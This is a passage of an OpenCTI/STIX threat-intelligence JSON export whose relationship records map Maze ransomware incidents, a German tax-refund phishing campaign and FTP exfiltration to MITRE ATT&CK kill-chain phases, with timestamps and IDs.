"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-01-07T14:39:37.369Z",
"modified": "2020-01-07T14:39:37.369Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-06T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d2671217-cd63-4fab-ae5d-8f424e07ce3f",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--e6676409-e7ad-4100-91df-175868b93131",
"type": "relationship",
"relationship_type": "uses",
"description": "files encryption",
"source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"target_ref": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"x_opencti_source_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_target_ref": "attack-patern--d3828e37-fb36-4bbd-83be-1eacacaaec9e",
"created": "2020-02-04T15:00:26.917Z",
"modified": "2020-02-04T15:00:26.917Z",
"x_opencti_first_seen": "2019-04-30T22:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "9b61352d-d22e-4062-8caf-9fb69245c0d6",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--c424d6d1-2338-4ce5-bf3b-e3c15494eb23",
"type": "relationship",
"relationship_type": "uses",
"description": "Maze's Threat Actor claimed Andrew Agencies was attacked on October 21st, 2019 when they breached their network and encrypted 245 computers.\nRansom amount asked : $1.1M",
"source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:05:50.672Z",
"modified": "2020-02-04T15:05:50.672Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "a2e9cb49-ff37-4bfc-8843-08e6fdf1bfc5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--7b58b77e-b69d-462e-8a48-a37403ab6e66",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"target_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"x_opencti_source_ref": "incident--996222f5-b03f-4055-9265-34bbfe9e95a4",
"x_opencti_target_ref": "organization--d4ac69a3-05ae-4184-8b2b-be93aaa84258",
"created": "2020-02-04T15:06:46.692Z",
"modified": "2020-02-04T15:06:46.692Z",
"x_opencti_first_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-20T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d5305338-d7fd-469b-9e48-a73706ed2f1b",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--35bb7efc-ff99-4ae2-8edf-609306dcdd38",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--82f427aa-7622-438f-9172-980fe432359c",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:11:22.149Z",
"modified": "2020-02-04T15:11:22.149Z",
"x_opencti_first_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7afb1062-d2b7-4146-8285-c989b0521cd7",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--384e4106-3db3-441f-aa4b-36205f49d2c8",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"target_ref": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"x_opencti_source_ref": "organization--5a510e41-5cb2-45cc-a191-a4844ea0a141",
"x_opencti_target_ref": "identity--5723cafe-2ef6-401c-a50b-0f0b754edb49",
"created": "2020-01-08T16:06:41.139Z",
"modified": "2020-01-08T16:06:41.139Z",
"x_opencti_first_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "acec4cc4-7f3f-49dd-a8bf-d4c0d82688da",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--8660671e-4e14-42a9-9582-c9b933e40367",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--8f2b5860-e9ab-4268-ace2-35b335578d2f",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:39:35.496Z",
"modified": "2020-02-04T15:39:35.496Z",
"x_opencti_first_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d16b43b6-a217-4a18-84a4-328acf76f3e2",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--4900c69b-95cb-4eac-a012-aa0cc971d523",
"type": "relationship",
"relationship_type": "gathering",
"source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"target_ref": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"x_opencti_source_ref": "organization--a0eef190-9335-40a7-bab2-bcf6179a28fe",
"x_opencti_target_ref": "identity--700b77c4-6eb1-40b0-98c8-14d454638a9f",
"created": "2020-02-04T15:49:28.190Z",
"modified": "2020-02-04T15:49:28.190Z",
"x_opencti_first_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_last_seen": "2020-02-03T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "2d660703-778b-4c55-99ac-63995adc2410",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--335444b8-a1df-4cb1-a1ce-f15377655a8a",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--af485c23-5498-400b-ba25-e05a9a3a0198",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:20.358Z",
"modified": "2020-02-05T10:05:20.358Z",
"x_opencti_first_seen": "2020-02-05T10:05:20.358Z",
"x_opencti_last_seen": "2020-02-05T10:05:20.358Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3865a11b-f6e8-4cee-adc6-69c6ef116cd0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--0a1f226a-697d-4625-a2e9-a540d5a93243",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:13.501Z",
"modified": "2020-02-05T10:06:13.501Z",
"x_opencti_first_seen": "2020-02-05T10:06:13.501Z",
"x_opencti_last_seen": "2020-02-05T10:06:13.501Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "ec3d24c8-27e1-4c76-9a82-9377ba8566b3",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--dcd2b964-691c-4d25-ae7b-602bd3bfb10d",
"type": "relationship",
"relationship_type": "uses",
"description": "Delivered by spearsphishing attachment.",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "malware--c521e7de-aeb9-439b-8bb3-cd93a88f27ea",
"created": "2020-02-04T14:43:51.749Z",
"modified": "2020-02-04T14:43:51.749Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c4b1984f-740b-48e2-a7d6-0e444c6a89af",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9757781f-2322-4a4e-8651-64a6e883c538",
"kill_chain_name": "mitre-attack",
"phase_name": "command-and-control",
"x_opencti_id": "13cfffc3-1a9e-3c61-9316-0df2bbd23390",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:56:35.000Z",
"x_opencti_modified": "2019-04-15T16:56:35.000Z"
},
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--db73ac7d-4992-4e24-a7dc-b8ca7e6a1dfa",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:52:04.610Z",
"modified": "2020-02-04T14:52:04.610Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "c4911576-ec4a-49e0-b761-148ab081ada5",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--7a40d101-a198-4ad0-8e28-7b1964e2a58e",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:52:37.608Z",
"modified": "2020-02-04T14:52:37.608Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "29eaad38-2732-4d7c-93c8-20e291036bfc",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--7e86b9d0-9584-435f-98f7-3a59cedb3f81",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "incident--580a4759-8c15-4e97-b1a5-11045d4d8d24",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-04T15:26:42.369Z",
"modified": "2020-02-04T15:26:42.369Z",
"x_opencti_first_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_last_seen": "2019-12-20T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "6b3a78d1-9be4-48e0-9c02-184bc26357e9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
]
},
{
"id": "relationship--ca24ea86-2325-469b-9031-a56075c124ac",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"target_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"x_opencti_source_ref": "incident--d32b3420-3309-4d77-b4bf-285d9f6fd883",
"x_opencti_target_ref": "organization--f000c60f-263c-4864-8c8b-50a4390f0453",
"created": "2020-02-04T15:44:30.266Z",
"modified": "2020-02-04T15:44:30.266Z",
"x_opencti_first_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "d745f008-6bc4-4dae-99bb-ceabae4908ca",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c4512510-c528-42ae-9345-438f0fd04e6d",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--3a0ab761-cca4-4aec-b127-b103d978b7ed",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:04:59.922Z",
"modified": "2020-02-05T10:04:59.922Z",
"x_opencti_first_seen": "2020-02-05T10:04:59.922Z",
"x_opencti_last_seen": "2020-02-05T10:04:59.922Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "e81dd45b-9c73-4795-8fe6-291d4662a2c0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--9a581b08-5371-4d0c-8ca1-a933c60b2030",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"x_opencti_source_ref": "indicator--4a642ed5-f664-410a-b9b9-e7f0ab65bd18",
"x_opencti_target_ref": "malware--c463976f-572b-4146-b9f2-c7bc0e092bc1",
"created": "2020-02-05T10:05:38.114Z",
"modified": "2020-02-05T10:05:38.114Z",
"x_opencti_first_seen": "2020-02-05T10:05:38.114Z",
"x_opencti_last_seen": "2020-02-05T10:05:38.114Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "5ffb5816-aa82-4e0f-85d4-009b67b9ce58",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--eb7acec0-1510-479e-abca-00056fd56e83",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:05:56.255Z",
"modified": "2020-02-05T10:05:56.255Z",
"x_opencti_first_seen": "2020-02-05T10:05:56.255Z",
"x_opencti_last_seen": "2020-02-05T10:05:56.255Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "b73f0b15-28f5-4def-a22b-42d4bf5d3faf",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--c0e4a44a-3b9f-4560-905a-636f2f6a8070",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:02.217Z",
"modified": "2020-02-05T10:06:02.217Z",
"x_opencti_first_seen": "2020-02-05T10:06:02.217Z",
"x_opencti_last_seen": "2020-02-05T10:06:02.217Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f46d6742-7877-4c47-880e-889631dc93f9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--f33f5d02-6467-49e0-9b10-95c55ef106b1",
"type": "relationship",
"relationship_type": "indicates",
"source_ref": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"x_opencti_source_ref": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"x_opencti_target_ref": "threat-actor--0e487cfa-afd8-4363-83fb-e114d908e1be",
"created": "2020-02-05T10:06:19.273Z",
"modified": "2020-02-05T10:06:19.273Z",
"x_opencti_first_seen": "2020-02-05T10:06:19.273Z",
"x_opencti_last_seen": "2020-02-05T10:06:19.273Z",
"x_opencti_weight": 1,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f168affd-d0f3-4187-8071-5c30e39f4fb0",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--d214bad4-8ae3-490b-83d9-00a8d0f6c7a1",
"type": "relationship",
"relationship_type": "targets",
"source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"target_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"x_opencti_source_ref": "incident--b18649a4-b77c-4f50-838d-5aca5fb727ba",
"x_opencti_target_ref": "identity--515216e3-ecd4-43b3-8d74-69df72b65a83",
"created": "2020-02-04T14:32:40.190Z",
"modified": "2020-02-04T14:32:40.190Z",
"x_opencti_first_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_last_seen": "2020-01-29T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "7d6a1270-be4c-4bb1-8daa-32726917315c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "relationship--5400ff3b-0487-4455-a772-9097ae7751c3",
"type": "relationship",
"relationship_type": "uses",
"description": "On October 16 and 23, Proofpoint researchers observed hundreds of emails attempting to deliver malicious Microsoft Word attachments with German lures impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance. Of particular note is the use of stolen branding as well as the use of lookalike .icu domains used for the sender email address in order to craft effective lures.\n\nThe lure states that a 2019 tax refund is due (\u201cBenachrichtigung \u00fcber die Steuerr\u00fcckerstattung\u201d) based on prior returns in the amount of several hundred euros (\u20ac694.00 in the observed sample)\nand that the recipient should submit a refund request (using an attached Microsoft Word document form) within three days for processing. The emails, as part of a low-volume campaign, were targeted primarily at IT services companies.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"created": "2020-01-07T14:29:15.310Z",
"modified": "2020-01-07T14:29:15.310Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-22T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "928981a4-6873-4181-a0aa-708335b50e81",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
]
},
{
"id": "relationship--d0ab3ef9-3303-4e00-b050-2a1fad8fdf53",
"type": "relationship",
"relationship_type": "uses",
"source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"x_opencti_source_ref": "campaign--35104704-87a9-4177-8952-ba73a0c3d9e3",
"x_opencti_target_ref": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"created": "2020-02-04T14:51:41.871Z",
"modified": "2020-02-04T14:51:41.871Z",
"x_opencti_first_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_last_seen": "2019-10-28T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "3d1deeac-bb26-441a-8484-6dfccf9367b9",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
]
},
{
"id": "relationship--907cfddb-6c6e-4eb1-8c56-1596c1ecf9bc",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--aae8b913-564b-405e-a9c1-5e5ea6c60259",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:57:01.930Z",
"modified": "2020-02-04T14:57:01.930Z",
"x_opencti_first_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_last_seen": "2019-10-15T22:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "71f29fa9-db84-4989-bb00-8c5e8aeede92",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--6cb972c9-84c3-4a01-8814-9ce23e386bc6",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--8f8e6d32-8a19-432e-aa8d-413b59ce4026",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:58:24.142Z",
"modified": "2020-02-04T14:58:24.142Z",
"x_opencti_first_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-05T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "76ac45fd-4360-40e1-9f92-24d299d6649c",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
"id": "relationship--217bfd74-4f42-483a-8e63-bb86f7566eed",
"type": "relationship",
"relationship_type": "uses",
"description": "exfiltration via FTP.",
"source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"x_opencti_source_ref": "campaign--4b02ceb0-e15c-40ea-b91b-4bbe0704c198",
"x_opencti_target_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created": "2020-02-04T14:58:43.323Z",
"modified": "2020-02-04T14:58:43.323Z",
"x_opencti_first_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_last_seen": "2019-11-11T23:00:00.000Z",
"x_opencti_weight": 3,
"x_opencti_role_played": "Unknown",
"x_opencti_id": "f91696bf-184b-4a79-9dfb-ca686295b116",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
]
},
{
